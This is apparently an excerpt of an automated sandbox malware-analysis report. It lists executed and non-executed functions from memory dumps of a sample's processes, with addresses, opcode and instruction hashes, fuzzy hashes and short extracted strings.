                                                                      • Opcode ID: 6732af2fd306ac7dc9bfbe35c7be31cfae5e43119263a3da44a0827b3b46e8da
                                                                      • Instruction ID: 9e9ce6b44bcfd59c2dfc566effeeb5b9a92551568961bdeeec192ff887065559
                                                                      • Opcode Fuzzy Hash: 6732af2fd306ac7dc9bfbe35c7be31cfae5e43119263a3da44a0827b3b46e8da
                                                                      • Instruction Fuzzy Hash: D721FC30D18969CFEB65DB04C454BE9B3E1FB59314F1085EAC40EE3291CB79AE88CB80
                                                                      Function 00007FFAAB446F3D Relevance: .1, Instructions: 57COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a20c2f16be8a5cf93c1741d7f0eecc350c1d05bc538523981da2460913dae605
                                                                      • Instruction ID: 239fc04a3d08b4a6a2dd6a6ab780083395807f37b6dc89078ff0fd2797dbc660
                                                                      • Opcode Fuzzy Hash: a20c2f16be8a5cf93c1741d7f0eecc350c1d05bc538523981da2460913dae605
                                                                      • Instruction Fuzzy Hash: B5117030D1E9098BEB54EB18D8466F976D1FF56340F1041B9D84FD32A2ED38686946C2
                                                                      Function 00007FFAAB440C38 Relevance: .1, Instructions: 54COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7d2bb3cf7ef24b03d8655264155837fbce6f2c0c7af57cb7afabf7b278c7a61a
                                                                      • Instruction ID: 958d5a679b9930a30a02119475dfa8c50176f44c802e02bc9f22e0f0c4c3c54e
                                                                      • Opcode Fuzzy Hash: 7d2bb3cf7ef24b03d8655264155837fbce6f2c0c7af57cb7afabf7b278c7a61a
                                                                      • Instruction Fuzzy Hash: 40119E35A0D689DFE7069B68C8401D97FB0EF83251F1485B7C489DB2A2E538266987D1
                                                                      Function 00007FFAAB440C40 Relevance: .0, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8605c5cd2ed30e922d213fdc2c823533a094b43cd86ef09129ed663d9de93910
                                                                      • Instruction ID: 034a2b631499da161201492a205d8ecd21f19c34d31f12b54a448c79055f56c8
                                                                      • Opcode Fuzzy Hash: 8605c5cd2ed30e922d213fdc2c823533a094b43cd86ef09129ed663d9de93910
                                                                      • Instruction Fuzzy Hash: 1E11AC35A0D289DFE7029B68C4401D97FB0EF82250F1485B6C449CB2A2D63826698780
                                                                      Function 00007FFAAB446F83 Relevance: .0, Instructions: 46COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ad5857418f803b61acc6e2da6c31959211e5dde0cadc5b271e9a3561c7aa7287
                                                                      • Instruction ID: 362b00be108e3da212128b5bf4222bc6b77c146f4163b3853cabbd2e03b6f199
                                                                      • Opcode Fuzzy Hash: ad5857418f803b61acc6e2da6c31959211e5dde0cadc5b271e9a3561c7aa7287
                                                                      • Instruction Fuzzy Hash: CB01E130A1950ACFEB54EB28D455AF872D1EF56340F1180B5D84FC72A3ED28A8694685
                                                                      Function 00007FFAAB440C48 Relevance: .0, Instructions: 42COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0fb33bb0b3f17d59341ab15ad9c1b10f822d6eba7bcab151df063c23b6d1dc84
                                                                      • Instruction ID: dd3d352653893482c2165113a11650171e4042ff6dcd5e90ed65bf565dd30d71
                                                                      • Opcode Fuzzy Hash: 0fb33bb0b3f17d59341ab15ad9c1b10f822d6eba7bcab151df063c23b6d1dc84
                                                                      • Instruction Fuzzy Hash: 9B016935A0D389DFE706DB68C8441D9BFB0EF43340F1485F6C449DB2A2EA386A68C781
                                                                      Function 00007FFAAB446FE1 Relevance: .0, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d07b5b26c3a0c20170229a639b96947a79ab10b6de91b9e0bc2cb91a825951a1
                                                                      • Instruction ID: d205cd1d13fa8f7ca909effce5fe6d1af4686036fd923160bdf71b7e2847470a
                                                                      • Opcode Fuzzy Hash: d07b5b26c3a0c20170229a639b96947a79ab10b6de91b9e0bc2cb91a825951a1
                                                                      • Instruction Fuzzy Hash: 8301363091941DCBEB64EB14D8456F873A1FF56341F1080F9D84FD32A2DD386DE98A85
                                                                      Function 00007FFAAB454D25 Relevance: .0, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5fb04a8ecc67890db30c3a10eeb76e0e86e6b84df3085faa2cf8fe9194738d51
                                                                      • Instruction ID: 4c4eb48d6c3a926962e49cf5ba2bf4c679c258a3add28ef3d7d2fb2cee1dc529
                                                                      • Opcode Fuzzy Hash: 5fb04a8ecc67890db30c3a10eeb76e0e86e6b84df3085faa2cf8fe9194738d51
                                                                      • Instruction Fuzzy Hash: 25F09630A4DD0BCFF656DB18A4506B93290FF95340F118279D44EC61AAEE28EC1981C4
                                                                      Function 00007FFAAB44701E Relevance: .0, Instructions: 33COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1251d3e82537e973c7b5756e56e94c0f5eb721292431cc287cbd807b10bf8afd
                                                                      • Instruction ID: 96d0a8341401b098fa60ff834e963995c1608b28686d2c73499279b7e334c14f
                                                                      • Opcode Fuzzy Hash: 1251d3e82537e973c7b5756e56e94c0f5eb721292431cc287cbd807b10bf8afd
                                                                      • Instruction Fuzzy Hash: CDF0D03091A509CBEA54EB14D4456F93391EF56380F1081B9DC8FD32F3DD286DAD4685
                                                                      Function 00007FFAAB478119 Relevance: .0, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b37aa13b1bd767f24f3e470871d6dfd3a9fabd4c5c4778cd171299428205be72
                                                                      • Instruction ID: a08276fa49abe39d026f06bce9d632830a9ff94055a979ab26b8eb21608ff79e
                                                                      • Opcode Fuzzy Hash: b37aa13b1bd767f24f3e470871d6dfd3a9fabd4c5c4778cd171299428205be72
                                                                      • Instruction Fuzzy Hash: 29E04F7194E7C08FC70B973588A88A07F64DE6721174A41EAC045CF6B3DA199C4AC712
                                                                      Function 00007FFAAB455B10 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7d552702ab8491adb02838352863212ba115fcbcd00fc4b57cdbf35e1e0c9235
                                                                      • Instruction ID: 31c1be1aecda61acda28c2d3a46695ccd06f9eaabd42630ea7bbeaf9b53ac20d
                                                                      • Opcode Fuzzy Hash: 7d552702ab8491adb02838352863212ba115fcbcd00fc4b57cdbf35e1e0c9235
                                                                      • Instruction Fuzzy Hash: 89D05E30B6090D4B8B0CA62D8858430F3D1EBAA6067D45278940BC2291ED25ECCA8B80
                                                                      Function 00007FFAAB453F50 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                      • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                                      • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                      • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                                      Function 00007FFAAB47AC70 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                      Function 00007FFAAB47AD40 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                      Function 00007FFAAB459FB0 Relevance: .0, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: abcbcaeb8d0c721ad865de90b881b92e51d0d8aa06d5b75fc438a606a999e681
                                                                      • Instruction ID: 4731d078e3a759ba495a7e0e0eb6d7b1bcf92d2f55c84211b01787c8f054e492
                                                                      • Opcode Fuzzy Hash: abcbcaeb8d0c721ad865de90b881b92e51d0d8aa06d5b75fc438a606a999e681
                                                                      • Instruction Fuzzy Hash: 6CE0DF31E899478BF304E304D4543F87201AB223A0F04C3B8C44C972E6EE2DAD4886C1
                                                                      Function 00007FFAAB454597 Relevance: .0, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 040c2250f45f466100b00db9bf6cea6b24336d6035abb1da3d4908798d5842a4
                                                                      • Instruction ID: 50a6669a16db10be93826f810b401af3ac35ed499f1ade32af020409dca0c05f
                                                                      • Opcode Fuzzy Hash: 040c2250f45f466100b00db9bf6cea6b24336d6035abb1da3d4908798d5842a4
                                                                      • Instruction Fuzzy Hash: 49E08C71E6992ECBF764EBA8D8056BD6BB1FB45640F90023AD009C7299CE242C068B91
                                                                      Function 00007FFAAB4725E0 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                      Function 00007FFAAB477700 Relevance: .0, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a7ccd9d2cca88e0acce79a096b5c88f796d61db368ddf3302dbc1b77a8c09c83
                                                                      • Instruction ID: 097c72fa5e49c4a95ac1e1f9c995a91fde8d094d0cd5c3ed92f52ea13d8ce6a2
                                                                      • Opcode Fuzzy Hash: a7ccd9d2cca88e0acce79a096b5c88f796d61db368ddf3302dbc1b77a8c09c83
                                                                      • Instruction Fuzzy Hash: F5D01234B619044F870CA739885987477D1EB6A216B9540A9D00AC76B1D96ADC99C781
                                                                      Function 00007FFAAB440B9A Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                                                      • Instruction ID: 7d708afda7aca91cb952d9e2c6bb4e175183190131fa63e7ece1ac36bf97878f
                                                                      • Opcode Fuzzy Hash: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                                                      • Instruction Fuzzy Hash: 4ED012345A68098FC654E728D9954A4BA90FB0A214F8901D0D40DC7161D35698A4C741
                                                                      Function 00007FFAAB4406A5 Relevance: .0, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 492715d0345259cd22954f87a1d169ce04240646543a6308cca8d53054399d7f
                                                                      • Instruction ID: f428fbc6977034d030d1d6b48820445d26cb1bb16331a2e643f6f0e8d3f511e8
                                                                      • Opcode Fuzzy Hash: 492715d0345259cd22954f87a1d169ce04240646543a6308cca8d53054399d7f
                                                                      • Instruction Fuzzy Hash: 70C08C01E0F40B83F800332ED4020ECA9005BCB290FD08032C80F402E59C0E20FD01C6
                                                                      Function 00007FFAAB4412B8 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                                                      • Instruction ID: 34169a35e06d53277d4e23f7ee869349ee897fcf519546a0bfc5e1c814ba86a4
                                                                      • Opcode Fuzzy Hash: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                                                      • Instruction Fuzzy Hash: CEC04C345519498FDA48EB29C88595477A0FB1A315BD50090E40DC7171D659DCD5C781
                                                                      Function 00007FFAAB443416 Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8c58bf073769455e7b999b1c4545b55f23bff31b6a5e9d0af020f5b62dd89b88
                                                                      • Instruction ID: 7178b429d055a1db33024aaf4e6f297a27c0205c78345adc54e3644e6ee84e6c
                                                                      • Opcode Fuzzy Hash: 8c58bf073769455e7b999b1c4545b55f23bff31b6a5e9d0af020f5b62dd89b88
                                                                      • Instruction Fuzzy Hash: 22C08C02F48C6683F2187228C02167F08429F80248F8004B0E00EC63C6CD0C9B0102C2
                                                                      Function 00007FFAAB443A81 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                                                      • Instruction ID: fc3dbd6b031368a8f4210c7d7a181a04218cece0ed456d64e22340746e301747
                                                                      • Opcode Fuzzy Hash: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                                                      • Instruction Fuzzy Hash: 0AC02B10C4D004C3F3294330C4011FE31401F5A300F05C172C00F52091DE2854281180
                                                                      Function 00007FFAAB4406C8 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                                                      • Instruction ID: 1401085b7badf1dab677a00a7fd944e1cebbd174fdf7aa36566134bf2590a3a9
                                                                      • Opcode Fuzzy Hash: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                                                      • Instruction Fuzzy Hash: ADB01200C5740F43E804337E48420E478505B4B140FC04070D80E40195984E10BC02C3

                                                                      Non-executed Functions

                                                                      Function 00007FFAAB4409B0 Relevance: 5.2, Strings: 4, Instructions: 194COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9$#{9
                                                                      • API String ID: 0-1692736845
                                                                      • Opcode ID: d51d87f4bf8dc3cd4ccfdd7a9390f68007acb6a097157c88452ed5e5a7d49aa0
                                                                      • Instruction ID: 0e1940acc0a3f8b1bc9895f3ce5b0a10781f4cda516efab16a0242bd87582379
                                                                      • Opcode Fuzzy Hash: d51d87f4bf8dc3cd4ccfdd7a9390f68007acb6a097157c88452ed5e5a7d49aa0
                                                                      • Instruction Fuzzy Hash: 9951F58FB4956376E21133BDF0099EC5BE8EFD1376B094AB7D14EC91834D08689982E5

                                                                      Executed Functions

                                                                      Function 00007FFAAB470D4C Relevance: 6.5, Strings: 5, Instructions: 262COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2388904058.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_7ffaab470000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "93$5X_H$b43$r63$r63
                                                                      • API String ID: 0-1044410338
                                                                      • Opcode ID: a0f05d94abf501c084e653ee7c54ca2175eaf5c3bd97d79e5e786ad1b940eed8
                                                                      • Instruction ID: 308521fdefc1f32a821b658698df80a62e63c0224e57000319a00c83e12a83c9
                                                                      • Opcode Fuzzy Hash: a0f05d94abf501c084e653ee7c54ca2175eaf5c3bd97d79e5e786ad1b940eed8
                                                                      • Instruction Fuzzy Hash: C891D3B6A19A898FE749DB6CC8657BD7FE1FB96350F4440AEC049D73A2CA781414C780
                                                                      Function 00007FFAAB4A1715 Relevance: 4.6, Strings: 3, Instructions: 896COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2388904058.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_7ffaab4a1000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I$X6$r63
                                                                      • API String ID: 0-1713481558
                                                                      • Opcode ID: 5a7c1abcb44a82a9ae85d16b9c653041fdd5f79337f6073411ac4213e3b58779
                                                                      • Instruction ID: 4b08741928bc0aba88c9b680d7b0383a1977d3f904ca1112c0b76c88e256d5eb
                                                                      • Opcode Fuzzy Hash: 5a7c1abcb44a82a9ae85d16b9c653041fdd5f79337f6073411ac4213e3b58779
                                                                      • Instruction Fuzzy Hash: 21126C6191E79A4FE31D9B2888451B57BE1EF93351F0886BED4CFC70A7D918A84B83C1
                                                                      Function 00007FFAAB4A1958 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2388904058.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_7ffaab4a1000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63
                                                                      • API String ID: 0-1294201789
                                                                      • Opcode ID: 725aede185b1024d3853a29893431d66a40f5602a146d405a3e72560a7a1958d
                                                                      • Instruction ID: 05a246f4b3142c39e38a91cf8a2a4382b0c796da656be57582878f2cb8529cac
                                                                      • Opcode Fuzzy Hash: 725aede185b1024d3853a29893431d66a40f5602a146d405a3e72560a7a1958d
                                                                      • Instruction Fuzzy Hash: A8819C62E2D6564BE31C4A2D4C420B277D6EBC7291B18C23DD9CFC7197DC18E84B42C0
                                                                      Function 00007FFAAB4A2CB6 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2388904058.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_7ffaab4a1000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63
                                                                      • API String ID: 0-1294201789
                                                                      • Opcode ID: ad2218b5ba7d22b0b30bfe1e2646f88904fc669063f64e7914c3de4a98e3a9b7
                                                                      • Instruction ID: 2957fe5fbc8a025091b12702c8cd76ac93fd3efa6225caea73ea9d007d002a17
                                                                      • Opcode Fuzzy Hash: ad2218b5ba7d22b0b30bfe1e2646f88904fc669063f64e7914c3de4a98e3a9b7
                                                                      • Instruction Fuzzy Hash: 3941B431A0C91ACFD759E758C894BB977A2FB99350F04827DD00DC72D6CE286C8987C1
                                                                      Function 00007FFAAB4A5494 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2388904058.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_7ffaab4a1000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 63
                                                                      • API String ID: 0-3819469774
                                                                      • Opcode ID: 569a6c86330f8598c1467a55480bc3c89e83cfcb04a9b0c8e9d8714e36e06816
                                                                      • Instruction ID: 5739016a8fe4e2848664f72435c97b4a4a424407657cacb211a26584f3bd7dc5
                                                                      • Opcode Fuzzy Hash: 569a6c86330f8598c1467a55480bc3c89e83cfcb04a9b0c8e9d8714e36e06816
                                                                      • Instruction Fuzzy Hash: 7F2160B1A199598FE798EB28C8556F8B7E1FFA8340F4085B9D04DC3192CD242DC58A80
                                                                      Function 00007FFAAB4ADF06 Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                                                      Download Yara Rule
